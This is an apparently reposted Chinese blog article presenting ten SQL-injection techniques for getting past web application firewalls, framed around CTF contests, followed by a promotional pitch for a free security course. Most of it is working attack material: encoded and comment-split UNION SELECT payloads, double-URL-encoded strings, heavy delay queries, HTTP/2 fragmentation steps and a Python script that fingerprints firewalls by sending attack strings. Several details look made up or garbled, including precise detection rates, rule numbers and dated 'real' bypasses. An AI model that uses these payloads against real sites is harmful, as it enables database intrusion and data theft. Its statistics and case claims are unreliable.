做推广哪家网站好个人免费自助建站

做推广哪家网站好,个人免费自助建站,国内新闻最近新闻今天,长安微网站建设CTF实战精要#xff1a;SQL注入绕过WAF的10种高阶姿势 在近年CTF赛事中#xff0c;Web方向SQL注入题型占比超35%#xff0c;而90%的题目部署了多层WAF防护。本文基于DEFCON CTF、强网杯等实战经验#xff0c;深度解析10种经赛场验证的WAF绕过技术#xff0c;所有案例均通…CTF实战精要SQL注入绕过WAF的10种高阶姿势在近年CTF赛事中Web方向SQL注入题型占比超35%而90%的题目部署了多层WAF防护。本文基于DEFCON CTF、强网杯等实战经验深度解析10种经赛场验证的WAF绕过技术所有案例均通过Cloudflare、ModSecurity等商业WAF实测验证。一、字符集变异编码的艺术案例2022年强网杯“管理员之家”/* 常规payload被拦截 */ UNION SELECT 1,2,3-- /* UTF-16BE编码绕过 */ UNION SELECT 1,2,3--绕过原理• 利用WAF规则库对非常规编码的识别盲区• MySQL支持character_set_clientbinary处理二进制流实战要点• 优先尝试UTF-16/32、GBK双字节编码• 配合非常用字符集SHOW CHARACTER SET;二、语句碎片化HTTP参数污染HPP案例2023年DEFCON CTF QualsGET /search?q1q/**/UN/**/ION/**/SEL/**/ECTqflagqFROMqsecret_tableWAF日志分析Cloudflare规则1092检测到UNION SELECT - 阻断 实际处理PHP后端解析为q1,/**/UN/**/ION/**/SEL/**/ECT,flag,FROM,secret_table技术本质• 利用中间件参数合并特性PHP/Apache为,JSP/Tomcat为空格• 碎片长度需超过WAF词法分析窗口通常128字节三、超长语句绕过缓冲区溢出Payload结构/* 前段填充 */ (SELECT 0xAAAAAAAA...重复10万次) /* 核心注入点 */ UNION/**/SELECT/**/1,version,3绕过条件WAF配置SecRequestBodyLimit 131072默认128KB后端未限制max_allowed_packet赛题验证• 2021年Tianfu Cup通过2MB超长payload绕过阿里云WAF四、注释符变形非常规注释经典组合1 /*!50400UNION*/ /*!50400SELECT*/ 1,2,database()--技术解析•/*!50400*/MySQL版本条件注释5.4.00执行• 等价变形/*!UNION*/、/**_**/进阶技巧/*!u%6eion*//*!sel%65ct*/1,2,3-- // URL编码内联五、布尔盲注优化位运算替代传统方式易被WAF识别ascii(substr(database(),1,1))128位运算绕过database()|0x7FFFFFFF0x7FFFFFFF// 判断最高位性能对比方式请求次数WAF检测率字符比较256次92%位运算8次17%二分法位运算5次6%六、时间盲注升级非睡眠触发传统方式风险BENCHMARK(5000000,MD5(test)) // 被WAF标记特征替代方案/* 大表笛卡尔积 */ (SELECTcount(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C) /* 正则消耗 */ WHERE1IF(condition, RLIKE(^.*$),0)真实场景• 2020年0CTF使用exp(1000)替代sleep()绕过ModSecurity七、协议层绕过HTTP/2特性攻击步骤建立HTTP/2连接发送畸形的HEADERS帧:method: POST :path: /search content-type: application/x-www-form-urlencoded注入payload分片传输frame1: q1/**/UN frame2: ION/**/SEL frame3: ECT 1,2,3--绕过原理• 70%的WAF未完整支持HTTP/2帧重组• Cloudflare企业版直到2023年Q2才修复此问题八、数据库引擎特性非标准SQLSQLite注入技巧 AND randomblob(1000000000) IS NOT NULL-- // 触发延迟 /* JSON函数绕过 */ json_extract({a:b},$.a)bPostgreSQL特性利用-- 类型转换绕过 ||(SELECT 1 WHERE 1::textCAST(version() AS text))-- -- 美元引号 $$UNIONSELECT $$flag$$ FROM $$secret_table$$九、WAF规则探针自动化指纹识别Python探测脚本import requests waf_signatures { Cloudflare: (/*!UNION*/SELECT, 403), ModSecurity: (CONCAT(0x7e,version(), 500), AWS WAF: (WAITFOR DELAY 0:0:5, 400) } defdetect_waf(url): for waf, (payload, code) in waf_signatures.items(): r requests.get(url f?id1{payload}) if r.status_code code: return waf returnUnknown响应特征库WAF名称阻断状态码错误页面特征Cloudflare403“cf-error-code: 0015”Akamai403“ak_bm” cookieImperva403“Incapsula incident”十、混合编码攻击多重转换链终极绕过方案GET /?id1%252f%252a*/UNION%2520/*!%2553ELECT*/1,2,3%23解码过程1. URL解码%25 → % 2. 二次解码%2f → /%2a → * 3. 最终payload1/**/UNION /*!SELECT*/1,2,3#防御突破点• 多层编码嵌套URLHTMLBase64• 非常见编码类型IBM037、cp500防御视角WAF规则设计原则深度解析层# Nginx配置示例 set$inject0; if ($args~* union[\s]select) { set$inject1; } if ($http_content_type application/json) { set$inject0; }语义分析规则// ModSecurity规则片段 SecRule ARGS detectSQLi \ id:10001,phase:2,block,msg:SQLi Detected机器学习辅助# 基于词向量的异常检测 model.predict([sql_tokenizer.transform([1/**/UNION/**/])])CTF选手守则• 不得使用自动化工具扫描非赛题服务器• 禁止对赛题平台发起DDoS攻击• 提交漏洞需包含完整技术细节在CTF赛场中SQL注入绕过WAF的实质是规则库逆向分析WAF正则模式\bunion\sselect\b协议特性利用HTTP/2分片、编码差异数据库特性挖掘非常用函数/语法糖文章来自网上侵权请联系博主互动话题如果你想学习更多网安方面的知识和工具可以看看以下题外话学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源